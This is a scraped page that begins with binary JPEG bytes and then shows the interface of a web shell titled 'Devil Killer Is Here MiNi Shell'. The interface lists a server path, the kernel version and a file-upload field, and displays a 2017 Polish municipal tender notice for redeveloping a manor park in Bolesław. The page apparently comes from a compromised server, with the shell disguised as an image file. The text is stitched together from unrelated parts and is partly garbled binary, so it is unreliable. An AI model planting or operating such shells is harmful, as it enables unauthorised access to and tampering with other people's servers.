JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170330/55125-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.gminaboleslaw.pl' target='_blank'>http://www.gminaboleslaw.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 55125 - 2017
              z dnia 2017-03-30 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Bolesław: II etap zagospodarowania parku dworskiego w Bolesławiu
z podziałem na dwa zadania:
Zadanie nr 1 - Zagospodarowanie terenu parku dworskiego w Bolesławiu i wykonanie zjazdu  drogowego.
Zadanie nr 2 - Zagospodarowanie terenu parku dworskiego w Bolesławiu  nasadzenia zieleni.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Regionalny Program Operacyjny Województwa Małopolskiego na lata 2014-2020 (w ramach Europejskiego Funduszu Rozwoju Regionalnego)</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Bolesław, krajowy numer identyfikacyjny
              27625788300000, ul.
              ul. Główna 
              58,
              32329  
              Bolesław, woj.
              małopolskie, państwo
              Polska, tel.
              032 642-45-01, 642-40-71, e-mail
              boleslaw@gminaboleslaw.pl, faks
              (032) 642 48 01.
              <br />
              Adres strony internetowej (URL): www.gminaboleslaw.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.gminaboleslaw.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Urząd Gminy Bolesław, 32-329 Bolesław,ul. Główna  58,</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>II etap zagospodarowania parku dworskiego w Bolesławiu
z podziałem na dwa zadania:
Zadanie nr 1 - Zagospodarowanie terenu parku dworskiego w Bolesławiu i wykonanie zjazdu  drogowego.
Zadanie nr 2 - Zagospodarowanie terenu parku dworskiego w Bolesławiu  nasadzenia zieleni.
<br /><b>Numer referencyjny: </b>IR.271.2.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>II etap zagospodarowania parku dworskiego w Bolesławiu,z podziałem na dwa zadania:
1. Zadanie nr 1 - Zagospodarowanie terenu parku dworskiego w Bolesławiu i wykonanie zjazdu  drogowego.
2. Zadanie nr  2 - Zagospodarowanie terenu parku dworskiego w Bolesławiu  nasadzenia zieleni.

1.1Zadanie nr 1 - Zagospodarowanie terenu parku dworskiego w Bolesławiu i wykonanie zjazdu drogowego
Zakres rzeczowy zadań obejmuje w szczególności  wykonanie:
-alejek z nawierzchnią z grysu porfirowego o szerokości 2,0 m, zajmujących powierzchnię ok.1 425,13 m2, 
-małej architektury (ławki usytuowane w zatoczkach z grysu porfirowego, kosze na śmieci), 
-ogrodzenia metalowego, ocynkowanego, malowanego proszkowo o szerokości i wysokości przęseł 250x150cm, z bramą i furtką wejściową , 
-oświetlenia  terenu,
-prac rozbiórkowych, 
-zjazdu drogowego,
-placu zabaw o pow. 350,10 m2 z nawierzchnią syntetyczną na podbudowie mineralnej wraz z zamontowaniem 8 szt. zabawek i tablicy informacyjnej wg zestawienia j.n.:

Nr 1  Zestaw zabawowy   na bazie trzech wież,składający się z: 
- wież z daszkiem czterospadowym   3 szt.
- zjeżdżalni 1 szt.
- zjeżdżalni małej 1 szt.
- schodów 1 szt.
- pomostu wysokiego4 szt.
- pomostu średniego4 szt.
- wejścia wspinaczkowego1 szt.
- przeplotni łukowej1 szt.
- drabinki poziomej1 szt.
- pomostu z belką1 szt.
- pomostu linowego1 szt.
- wieży z liną1 szt.
- przejście rurowe1 szt.
Szczegółowy opis Zestawu zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej.

Nr 2  -  Huśtawka wahadłowa podwójna
Huśtawka  wahadłowa podwójna  1 szt.
Szczegółowy opis huśtawki zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr  3   Huśtawka wagowa  konik
Huśtawka wagowa  1 szt.
Szczegółowy opis huśtawki wagowej zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr 4  - Huśtawka wagowa na sprężynach 
Huśtawka wagowa  1 szt.
Szczegółowy opis huśtawki wagowej na sprężynach zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr 5 i 6   Sprężynowiec  kaczka, autko
huśtawka na sprężynie (kaczka, autko) -  2 szt.
Szczegółowy opis sprężynowców zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr 7  - Pociąg
Pociąg - zestaw trzyelementowy  1 szt. 
Szczegółowy opis pociągu zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr 8  - Karuzela
Karuzela obrotowa  1 szt.
Szczegółowy opis karuzeli zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

Nr  9   Tablica informacyjna
Tablica informacyjna  - Regulamin placu zabaw  1 szt.
Szczegółowy opis tablicy informacyjnej zawarty został w Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych oraz dokumentacji projektowej, w tym w przedmiarze robót.

1.1.1.	Wykonanie projektu organizacji ruchu dla budowanego zjazdu.
1.1.2.	Wykonanie oznakowania i zabezpieczeń terenu robót zgodnie z projektem organizacji ruchu.
1.1.3.	Opracowanie dokumentacji powykonawczej.
1.1.4.	Wykonanie inwentaryzacji geodezyjnej powykonawczej, poświadczonej za zgodność z oryginałem przyjętym do zasobów.
1.1.5.	Opracowanie na  potrzeby Małopolskiego Konserwatora Zabytków dokumentacji powykonawczej ( w ilości 2 egz.),  przez osobę odpowiedzialną za wykonanie robót budowlanych, obrazującej przebieg robót i zawierającej opracowanie ich wyników w sposób umożliwiający identyfikację i dokładną lokalizację przestrzenną wszystkich czynności, użytych materiałów i dokonanych odkryć (wraz z dokumentacją fotograficzną), oraz zawierającą określenie sposobu postępowania z zabytkiem po zakończeniu wskazanych w pozwoleniu robót budowlanych.
1.1.6.	Realizowanie przedmiotu umowy zgodnie z Pozwoleniem nr 140/16 z dnia 09.02.2016 r. Małopolskiego Wojewódzkiego Konserwatora Zabytków na prowadzenie robót budowlanych przy zabytku wpisanym do rejestru zabytków.
1.1.7.	Realizowanie zadania zgodnie z pozwoleniem na budowę - decyzją nr 150/2016 z dnia 22.03.2016 r. Starosty Olkuskiego. 
Uwaga: Gmina Bolesław wykonała wytyczenia geodezyjnego działki  parku w 2016 r. i wskaże, na potrzeby realizacji zadania, przebieg granic.

1.2.	Zadanie nr 2 - Zagospodarowanie terenu parku dworskiego w Bolesławiu  nasadzenia zieleni

Zakres rzeczowy zadań obejmuje w szczególności :
wykonanie nasadzeń drzew i krzewów , wraz z ich minimalną 12 miesięczną pielęgnacją, licząc od dnia podpisania przez strony protokołu końcowego odbioru robót,  w ilości: 
- drzewa liściaste	- 	    6 szt.
- krzewy liściaste	- 	 485 szt.
- krzewy iglaste	 -	   12 szt.
Szczegółowy zakres zadania zawarty został w dokumentacji projektowej, w tym w przedmiarze robót.
1.2.1	Prowadzenie Dziennika prac konserwatorskich.
1.2.2	Opracowanie na  potrzeby Małopolskiego Konserwatora Zabytków dokumentacji powykonawczej ( w ilości 2 egz.), obrazującej przebieg prac i zawierającej wskazania dla użytkownika.
1.2.3	Realizowanie zadania zgodnie z Pozwoleniem nr 22/16 z dnia 09.02.2016 r. na prowadzenie prac polegających na zabezpieczeniu, rekonstrukcji lub konserwacji parków zabytkowych oraz innego rodzaju zorganizowanej zieleni zabytkowej.
1.2.4	Realizowanie zadania zgodnie z pozwoleniem na budowę - decyzją nr 150/2016 z dnia 22.03.2016r. Starosty Olkuskiego. 
1.2.5	Prowadzenie prac pielęgnacyjnych w okresie gwarancyjnym, zgodnie z postanowieniami w dokumentacji projektowej.

Szczegółowy opis przedmiotu zamówienia (Zadania nr 1 i Zadania nr 2) zawierają:
- przedmiary robót 
-specyfikacja techniczna wykonania i odbioru robót budowlanych
-dokumentacja projektowa.
stanowiące  Załączniki  nr 6 -15 do SIWZ
<br /><br /><b>II.5) Główny kod CPV: </b>45233120-6<br /><b> Dodatkowe kody CPV:</b>45233200-1,
                45236210-5,
                45236290-9,
                45311000-0,
                45220000-5,
                45230000-8,
                77310000-6,
                77211600-8,
                77211500-7<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 06/03/2018<br /></div><div style="padding-left: 20px">
                    data rozpoczęcia: 20/03/2018
                    data zakończenia: 30/04/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b>1.Zadanie nr 1- Zagospodarowanie terenu parku dworskiego w Bolesławiu i wykonanie zjazdu drogowego 
 od dnia podpisania umowy w 2017 roku do dnia 06.03.2018 r., przy czym na podstawie Harmonogramu Rzeczowo-Finansowego, będącego Załącznikiem nr 1 do umowy: 
- Faza  I  (do wykonania w 2017 r.): 	zakończenie robót  do 30.09.2017r.
- Faza  II (do wykonania w 2018 r.):	zakończenie robót  do 06.03.2018r.

2.Zadanie nr 2- Zagospodarowanie terenu parku dworskiego w Bolesławiu  nasadzenia zieleni 
 podpisanie umowy w 2017 r.,a realizacja od 20.03.2018 r. do 30.04.2018r.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. dla Zadania nr 1 - Zagospodarowanie terenu parku dworskiego w Bolesławiu i wykonanie zjazdu drogowego.
1.1  Zdolność techniczna i zawodowa:
a)Wykonawca wykaże dysponowanie osobami zdolnymi do realizacji zamówienia,                w tym:
- osobą na stanowisku Kierownika budowy, posiadającą uprawnienia budowlane 
np.  do kierowania robotami budowlanymi w specjalności konstrukcyjno  budowlanej*

-osobą na stanowisku Kierownika robót elektrycznych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  instalacyjnej w zakresie sieci, instalacji i urządzeń  elektrycznych i elektroenergetycznych *

-osobą na stanowisku Kierownika robót drogowych, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej *
wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami  Załącznik nr 2 do SIWZ
  
Wykazane osoby powinny aktualnie przynależeć  do właściwej izby samorządu zawodowego, natomiast osoba na stanowisku kierownika budowy winna wykazać, że przez co najmniej 18 miesięcy brała udział w robotach budowlanych prowadzonych przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury**.  

* w rozumieniu przepisów Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w sprawie samodzielnych funkcji technicznych w budownictwie( Dz. U. z 2014 r., poz.1278).
**    w rozumieniu przepisów ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2014 r. , poz.1446 ze zm.).

b)Wykonawca w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał min. jedną robotę budowlaną w zakresie wykonania zagospodarowania terenu obejmującego łącznie montaż lub budowę obiektów małej architektury, ogrodzenia, budowę lub przebudowę nawierzchni utwardzonej, budowę lub przebudowę oświetlenia parkowego lub drogowego o minimalnej wartości 600 000,00 zł brutto, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania i podmiotów, na rzecz których te roboty zostały wykonane, z załączeniem dowodów, określających, czy roboty te zostały wykonane należycie oraz wskazujących czy zostały wykonane zgodnie z przepisami prawa budowlanego i  prawidłowo ukończone - Załącznik nr2 do SIWZ.


2. dla Zadania nr 2 - Zagospodarowanie terenu parku dworskiego w Bolesławiu  nasadzenia zieleni

2.1.Zdolność techniczna i zawodowa:

a)Wykonawca wykaże dysponowanie osobami zdolnymi do realizacji zamówienia, 
w tym:
- osobą na stanowisku Kierownika robót, która ukończyła studia drugiego stopnia lub jednolite studia magisterskie, których program obejmuje zajęcia lub grupy zajęć umożliwiające nabycie wiedzy i umiejętności w tym zakresie, oraz która po rozpoczęciu studiów drugiego stopnia lub po zaliczeniu szóstego semestru jednolitych studiów magisterskich, przez co najmniej 9  miesięcy brała udział w pracach konserwatorskich lub pracach restauratorskich prowadzonych przy tego rodzaju zabytkach wpisanych do rejestru, lub była zatrudniona przy tych pracach w muzeum będącym instytucją kultury**.  

- osobą , która będzie wykonywała samodzielne prace o charakterze technicznym ( nasadzenia zieleni),  która posiada świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający kwalifikacje zawodowe w zawodach związanych z pielęgnacją zieleni, albo przez co najmniej 9 miesięcy brała udział w tego rodzaju pracach prowadzonych przy zabytkach wpisanych do rejestru lub była zatrudniona przy tych pracach w muzeum będącym instytucją kultury**.

**  w rozumieniu przepisów ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami (Dz. U. z 2014 r. , poz.1446 ze zm.).


c)Wykonawca w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał należycie min.  jedną usługę odpowiadającą swoim rodzajem przedmiotowi zamówienia tj. sadzenie drzew i krzewów o wartości min. 30 000 zł brutto, wraz z podaniem ich wartości, przedmiotu, dat wykonania 
i podmiotów, na rzecz których te usługi zostały wykonane, z załączeniem dowodów, określających, czy usługi te zostały wykonane należycie - Załącznik nr 2 do SIWZ.

3.Warunek udziału w postępowaniu dotyczący niezbędnej wiedzy i doświadczenia, musi być spełniony:
  -  przez Wykonawcę samodzielnie,
  -  przez minimum jeden podmiot udostępniający wiedzę i doświadczenie (podwykonawcę)samodzielnie; a w przypadku podmiotów występujących wspólnie, samodzielnie przez minimum jednego z wykonawców występujących wspólnie.

<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Odpis z właściwego rejestru lub z centralnej ewidencji informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 Pzp. Dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.Zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz 
z ewentualnymi odsetkami lub grzywnami, w szczególności  uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
